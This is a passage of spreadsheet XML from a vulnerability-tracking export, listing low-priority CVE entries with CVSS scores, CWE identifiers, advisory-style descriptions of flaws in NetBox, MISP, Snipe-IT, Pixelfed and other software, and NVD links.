          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86176</t>
        </is>
      </c>
      <c r="C5259" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5259" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5259" s="5" t="inlineStr"/>
      <c r="F5259" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5259" s="5" t="inlineStr"/>
      <c r="H5259" s="5" t="inlineStr"/>
      <c r="I5259" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5259" s="5" t="inlineStr"/>
      <c r="K5259" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5259" s="5" t="inlineStr">
        <is>
          <t>NetBox through 4.7.0 fails to properly scope user-private records in REST and GraphQL API endpoints for Notifications, Subscriptions, and Bookmarks. Authenticated users with view permissions can access all users' private records through unscoped querysets, disclosing which users watch or bookmark which objects.</t>
        </is>
      </c>
      <c r="M5259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86176</t>
        </is>
      </c>
    </row>
    <row r="5260">
      <c r="A5260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86178</t>
        </is>
      </c>
      <c r="C5260" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5260" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5260" s="5" t="inlineStr"/>
      <c r="F5260" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5260" s="5" t="inlineStr"/>
      <c r="H5260" s="5" t="inlineStr"/>
      <c r="I5260" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5260" s="5" t="inlineStr"/>
      <c r="K5260" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5260" s="5" t="inlineStr">
        <is>
          <t>Pixelfed through 0.12.9 fails to validate follower status in StoryComposeController react and comment endpoints, allowing authenticated users to access follower-only stories. Attackers can enumerate sequential story IDs and submit reactions or comments to retrieve story media URLs and author information without following the account.</t>
        </is>
      </c>
      <c r="M5260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86178</t>
        </is>
      </c>
    </row>
    <row r="5261">
      <c r="A5261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86191</t>
        </is>
      </c>
      <c r="C5261" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5261" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5261" s="5" t="inlineStr"/>
      <c r="F5261" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5261" s="5" t="inlineStr"/>
      <c r="H5261" s="5" t="inlineStr"/>
      <c r="I5261" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5261" s="5" t="inlineStr"/>
      <c r="K5261" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5261" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.2 contain an information disclosure vulnerability in the getAttributeViewKeysByID endpoint that allows publish readers to enumerate private attribute view key definitions without verifying parent database visibility. Attackers can access the endpoint to retrieve complete key schemas including sensitive field names and relation definitions from hidden databases.</t>
        </is>
      </c>
      <c r="M5261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86191</t>
        </is>
      </c>
    </row>
    <row r="5262">
      <c r="A5262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86202</t>
        </is>
      </c>
      <c r="C5262" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5262" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5262" s="5" t="inlineStr"/>
      <c r="F5262" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5262" s="5" t="inlineStr"/>
      <c r="H5262" s="5" t="inlineStr"/>
      <c r="I5262" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5262" s="5" t="inlineStr"/>
      <c r="K5262" s="5" t="inlineStr">
        <is>
          <t>CWE-406</t>
        </is>
      </c>
      <c r="L5262" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.39.2 contain a network amplification vulnerability in ActorEventPacket handling that allows clients to trigger consuming animations for all visible players. Attackers can send crafted ActorEventPacket messages to spam animation events to other clients and waste server CPU and memory resources.</t>
        </is>
      </c>
      <c r="M5262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86202</t>
        </is>
      </c>
    </row>
    <row r="5263">
      <c r="A5263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86205</t>
        </is>
      </c>
      <c r="C5263" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5263" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5263" s="5" t="inlineStr"/>
      <c r="F5263" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5263" s="5" t="inlineStr"/>
      <c r="H5263" s="5" t="inlineStr"/>
      <c r="I5263" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5263" s="5" t="inlineStr"/>
      <c r="K5263" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L5263" s="5" t="inlineStr">
        <is>
          <t>h3 versions before 2.0.1-rc.18 contain an open redirect vulnerability in the redirectBack() utility that fails to sanitize protocol-relative paths in the Referer header pathname. Attackers can craft a same-origin URL with a double-slash path segment that passes origin validation but produces a Location header interpreted by browsers as a protocol-relative redirect to an external domain.</t>
        </is>
      </c>
      <c r="M5263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86205</t>
        </is>
      </c>
    </row>
    <row r="5264">
      <c r="A5264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86342</t>
        </is>
      </c>
      <c r="C5264" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5264" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5264" s="5" t="inlineStr"/>
      <c r="F5264" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5264" s="5" t="inlineStr"/>
      <c r="H5264" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I5264" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5264" s="5" t="inlineStr"/>
      <c r="K5264" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5264" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP contain improper authorization checks in the freetext feed preview functionality. The preview performed correlation lookups against attributes from events without applying the requesting user's ACL, allowing restricted event correlations and associated event information to be exposed to users who could not otherwise access those events. The vulnerable queries were scoped only by attribute values and deletion status rather than MISP's event, organization, sharing-group, attribute, and object-level access controls.
The same preview functionality also returned cross-feed correlation information without properly restricting the feed list to feeds visible to the caller. This exposed metadata for feeds that were not marked lookup_visible; one affected response additionally included the configured feed URL even though that value was not required by the feature.
The fixes apply the caller's ACL to attribute correlation searches, remove feed URLs from correlation results, restrict cross-feed results according to feed visibility, and correct host-organization ID comparison so the authorization rules are applied consistently.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M5264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86342</t>
        </is>
      </c>
    </row>
    <row r="5265">
      <c r="A5265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86416</t>
        </is>
      </c>
      <c r="C5265" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5265" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5265" s="5" t="inlineStr"/>
      <c r="F5265" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5265" s="5" t="inlineStr"/>
      <c r="H5265" s="5" t="inlineStr"/>
      <c r="I5265" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5265" s="5" t="inlineStr"/>
      <c r="K5265" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5265" s="5" t="inlineStr">
        <is>
          <t>ILIAS versions before 9.23, 10.11, and 11.4 contain an authorization bypass vulnerability in ilObjGroupGUI where saveMapSettingsObject() and updateGroupTypeObject() perform state-changing operations without write permission checks. Authenticated users with only read access to a group can craft POST requests to modify group map settings and didactic template assignments, changing group modes and permissions for all members.</t>
        </is>
      </c>
      <c r="M5265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86416</t>
        </is>
      </c>
    </row>
    <row r="5266">
      <c r="A5266" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86417</t>
        </is>
      </c>
      <c r="C5266" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5266" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5266" s="5" t="inlineStr"/>
      <c r="F5266" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5266" s="5" t="inlineStr"/>
      <c r="H5266" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I5266" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5266" s="5" t="inlineStr"/>
      <c r="K5266" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862</t>
        </is>
      </c>
      <c r="L5266" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP inconsistently enforced email-address visibility in DashboardsController::listTemplates().
The query always fetched User.email, while redaction happened only inside the non-REST rendering branch. As a result, the same authenticated user who saw redacted data in the normal HTML interface could request the REST/JSON representation and receive template owners’ email addresses without the intended privilege check.
The fix moves the decision to a centralized User::canSeeEmails() authorization helper. Email addresses are now fetched only when the requester is a site administrator or the instance explicitly enables Security.disclose_user_emails. The same helper is also reused by other dashboard widgets to keep email-disclosure policy consistent.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M5266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86417</t>
        </is>
      </c>
    </row>
    <row r="5267">
      <c r="A5267" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86436</t>
        </is>
      </c>
      <c r="C5267" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5267" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5267" s="5" t="inlineStr"/>
      <c r="F5267" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5267" s="5" t="inlineStr"/>
      <c r="H5267" s="5" t="inlineStr"/>
      <c r="I5267" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5267" s="5" t="inlineStr"/>
      <c r="K5267" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5267" s="5" t="inlineStr">
        <is>
          <t>Lara Dashboard before 1.3.2 fails to authorize access to the post-builder image and video upload endpoints, allowing authenticated accounts without content permissions to upload files. Attackers can upload polyglot files with attacker-chosen extensions to the public web root and execute code if the deployment permits execution of the uploaded file type.</t>
        </is>
      </c>
      <c r="M5267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86436</t>
        </is>
      </c>
    </row>
    <row r="5268">
      <c r="A5268" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86451</t>
        </is>
      </c>
      <c r="C5268" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5268" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5268" s="5" t="inlineStr"/>
      <c r="F5268" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5268" s="5" t="inlineStr"/>
      <c r="H5268" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I5268" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5268" s="5" t="inlineStr"/>
      <c r="K5268" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L5268" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP allow authenticated users to retrieve object-reference records by UUID through EventGraphTool::get_reference_data() without first checking whether the requester is authorized to view the object the reference belongs to.
The vulnerable code queried ObjectReference.uuid directly and returned the matching row whenever it existed. Because no parent-object ACL was applied, a user who knew or obtained a reference UUID could retrieve information associated with an object outside their normal access scope. The commit explicitly states that any object reference could be returned by UUID without authorizing its parent object.
The fix retrieves the referenced object's object_id and calls fetchObjectSimple() with the current user. If the user cannot access that parent object, MISP now returns NotFoundException instead of exposing the reference.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M5268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86451</t>
        </is>
      </c>
    </row>
    <row r="5269">
      <c r="A5269" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86469</t>
        </is>
      </c>
      <c r="C5269" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5269" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5269" s="5" t="inlineStr"/>
      <c r="F5269" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5269" s="5" t="inlineStr"/>
      <c r="H5269" s="5" t="inlineStr"/>
      <c r="I5269" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5269" s="5" t="inlineStr"/>
      <c r="K5269" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L5269" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GLib2. When g_file_replace() is used with G_FILE_CREATE_REPLACE_DESTINATION and creating the .goutputstream-XXXXXX temporary file fails, the library unlinks the destination and recreates it without exclusive creation or symlink protection. A local attacker who can write to the destination directory can win that race and redirect the write to another file.</t>
        </is>
      </c>
      <c r="M5269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86469</t>
        </is>
      </c>
    </row>
    <row r="5270">
      <c r="A5270" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86714</t>
        </is>
      </c>
      <c r="C5270" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5270" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5270" s="5" t="inlineStr"/>
      <c r="F5270" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5270" s="5" t="inlineStr"/>
      <c r="H5270" s="5" t="inlineStr"/>
      <c r="I5270" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5270" s="5" t="inlineStr"/>
      <c r="K5270" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5270" s="5" t="inlineStr">
        <is>
          <t>PX4 Autopilot through 1.17.0 contains a stack buffer over-read vulnerability in the netman system command that fails to validate interface name length. Attackers can supply interface names of 74 bytes or more via the -i option to read beyond buffer boundaries, leaking stack memory to console output or writing it into persistent network configuration files.</t>
        </is>
      </c>
      <c r="M5270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86714</t>
        </is>
      </c>
    </row>
    <row r="5271">
      <c r="A5271" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86719</t>
        </is>
      </c>
      <c r="C5271" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5271" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5271" s="5" t="inlineStr"/>
      <c r="F5271" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5271" s="5" t="inlineStr"/>
      <c r="H5271" s="5" t="inlineStr"/>
      <c r="I5271" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5271" s="5" t="inlineStr"/>
      <c r="K5271" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5271" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 (master) contains a cross-site request forgery vulnerability in the CustomizeUser plugin endpoint plugin/CustomizeUser/swapUser.json.php. The endpoint takes users_id from $_REQUEST and invokes User::swapUser() without calling forbidIfNotPost() or forbidIfInvalidToken(), and the global autoCSRFGuard() check only runs for POST requests to *.json.php, so the action is reachable via GET. An attacker who causes an authenticated administrator's browser to issue a cross-origin GET (for example via an &lt;img&gt; tag or link) can replace that administrator's session with a non-admin user account, causing the administrator to lose administrative access until the swap is cancelled; swapping to another administrator account is rejected, so this is not privilege escalation. The JSON response also discloses the session_id. The CustomizeUser plugin is enabled by default, and no patch was available at the time of publication.</t>
        </is>
      </c>
      <c r="M5271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86719</t>
        </is>
      </c>
    </row>
    <row r="5272">
      <c r="A5272" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86736</t>
        </is>
      </c>
      <c r="C5272" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5272" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5272" s="5" t="inlineStr"/>
      <c r="F5272" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5272" s="5" t="inlineStr"/>
      <c r="H5272" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="I5272" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5272" s="5" t="inlineStr"/>
      <c r="K5272" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="L5272" s="5" t="inlineStr">
        <is>
          <t>snipe-it before 8.7.0 contains an incorrect calculation vulnerability in checkout request handling that allows authenticated users to corrupt the assets.requests_counter through duplicate submissions and cancellations without active requests. Attackers can repeatedly call cancel endpoints without active requests to drive the counter negative, or submit duplicate checkout requests to inflate the counter, misrepresenting pending demand in the admin queue.</t>
        </is>
      </c>
      <c r="M5272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86736</t>
        </is>
      </c>
    </row>
    <row r="5273">
      <c r="A5273" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86737</t>
        </is>
      </c>
      <c r="C5273" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5273" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5273" s="5" t="inlineStr"/>
      <c r="F5273" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5273" s="5" t="inlineStr"/>
      <c r="H5273" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="I5273" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5273" s="5" t="inlineStr"/>
      <c r="K5273" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5273" s="5" t="inlineStr">
        <is>
          <t>snipe-it versions before 8.7.0 fail to enforce asset view authorization in the GET /hardware/{asset}/barcode endpoint. Authenticated attackers can iterate asset IDs to retrieve barcodes and enumerate asset tags across tenants, including soft-deleted and cross-company assets.</t>
        </is>
      </c>
      <c r="M5273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86737</t>
        </is>
      </c>
    </row>
    <row r="5274">
      <c r="A5274" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86743</t>
        </is>
      </c>
      <c r="C5274" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5274" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5274" s="5" t="inlineStr"/>
      <c r="F5274" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5274" s="5" t="inlineStr"/>
      <c r="H5274" s="5" t="inlineStr"/>
      <c r="I5274" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5274" s="5" t="inlineStr"/>
      <c r="K5274" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5274" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to properly scope asset acceptance report queries by company, allowing authenticated reports.view users to read pending acceptances across all companies. Attackers can access the unaccepted_assets report page or CSV export to disclose cross-company inventory details and assignee names without per-row access validation.</t>
        </is>
      </c>
      <c r="M5274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86743</t>
        </is>
      </c>
    </row>
    <row r="5275">
      <c r="A5275" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86747</t>
        </is>
      </c>
      <c r="C5275" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5275" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5275" s="5" t="inlineStr"/>
      <c r="F5275" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5275" s="5" t="inlineStr"/>
      <c r="H5275" s="5" t="inlineStr"/>
      <c r="I5275" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5275" s="5" t="inlineStr"/>
      <c r="K5275" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5275" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT is an open source IT asset management system. In versions up to and including 8.6.3, the report acceptance endpoints POST /reports/unaccepted_assets/sent_reminder (ReportsController::sentAssetAcceptanceReminder) and DELETE /reports/unaccepted_assets/{acceptanceId}/delete (ReportsController::deleteAssetAcceptance) are not correctly scoped when Full Multiple Company Support (FMCS) is enabled. In 8.6.3 the guard ReportsController::currentUserCanAccessAcceptance() early-exits with 'return true' when '! $user-&gt;company_id' is truthy, which is the case for every pivot-only user (a user associated with companies through the company_user pivot table whose scalar users.company_id column is NULL); versions prior to 8.6.3 lacked the guard altogether. As a result, an authenticated user holding the reports.view permission can send acceptance-reminder emails for, and permanently delete, any pending acceptance record in the install regardless of which company owns the underlying checkoutable. Deletion is destructive and forfeits the acceptance audit trail for the affected item, and the reminder email exposes limited cross-company acceptance context (item name and assignment metadata) to the recipient. Acceptance IDs are sequential integers and can be enumerated. This issue is fixed in version 8.7.0.</t>
        </is>
      </c>
      <c r="M5275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86747</t>
        </is>
      </c>
    </row>
    <row r="5276">
      <c r="A5276" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86752</t>
        </is>
      </c>
      <c r="C5276" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5276" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5276" s="5" t="inlineStr"/>
      <c r="F5276" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5276" s="5" t="inlineStr"/>
      <c r="H5276" s="5" t="inlineStr"/>
      <c r="I5276" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5276" s="5" t="inlineStr"/>
      <c r="K5276" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5276" s="5" t="inlineStr">
        <is>
          <t>snipe-it versions before 8.7.0 fail to enforce per-instance FMCS scoping in asset audit endpoints, relying solely on query-layer filtering instead of policy-layer authorization checks. Attackers with valid sessions and assets.audit permissions could write audit log entries against cross-company assets if the query-layer scope were bypassed or refactored.</t>
        </is>
      </c>
      <c r="M5276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86752</t>
        </is>
      </c>
    </row>
    <row r="5277">
      <c r="A5277" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86753</t>
        </is>
      </c>
      <c r="C5277" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5277" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5277" s="5" t="inlineStr"/>
      <c r="F5277" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5277" s="5" t="inlineStr"/>
      <c r="H5277" s="5" t="inlineStr"/>
      <c r="I5277" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5277" s="5" t="inlineStr"/>
      <c r="K5277" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5277" s="5" t="inlineStr">
        <is>
          <t>snipe-it versions before 8.7.0 fail to validate the requestable flag for asset models in the POST /account/request/asset_model/{modelId} endpoint. Authenticated users can bypass administrative restrictions and create checkout requests for non-requestable asset models by submitting requests directly to the endpoint.</t>
        </is>
      </c>
      <c r="M5277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86753</t>
        </is>
      </c>
    </row>
    <row r="5278">
      <c r="A5278" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86755</t>
        </is>
      </c>
      <c r="C5278" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5278" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5278" s="5" t="inlineStr"/>
      <c r="F5278" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5278" s="5" t="inlineStr"/>
      <c r="H5278" s="5" t="inlineStr"/>
      <c r="I5278" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5278" s="5" t="inlineStr"/>
      <c r="K5278" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5278" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions 4.2.0 through 8.6.3 expose Laravel Passport's auto-registered personal-access-token routes (GET, POST, DELETE /oauth/personal-access-tokens*) with only 'web' and 'auth:web' middleware, without the self.api permission gate that Snipe-IT enforces on its own token endpoints (/account/api and /api/v1/account/personal-access-tokens). Any user with a valid web session and the corresponding CSRF token can POST to /oauth/personal-access-tokens and mint a long-lived bearer token for their own account, even when an administrator has denied the self.api permission. The issued token is still subject to existing per-endpoint authorization policies, so this is not a privilege escalation; it defeats the administrative control intended to block API/scripted access at the user's own permission level. Fixed in 8.7.0 (commit 3f74b8c), which registers overriding routes wrapped in the can:self.api middleware.</t>
        </is>
      </c>
      <c r="M5278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86755</t>
        </is>
      </c>
    </row>
    <row r="5279">
      <c r="A5279" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86756</t>
        </is>
      </c>
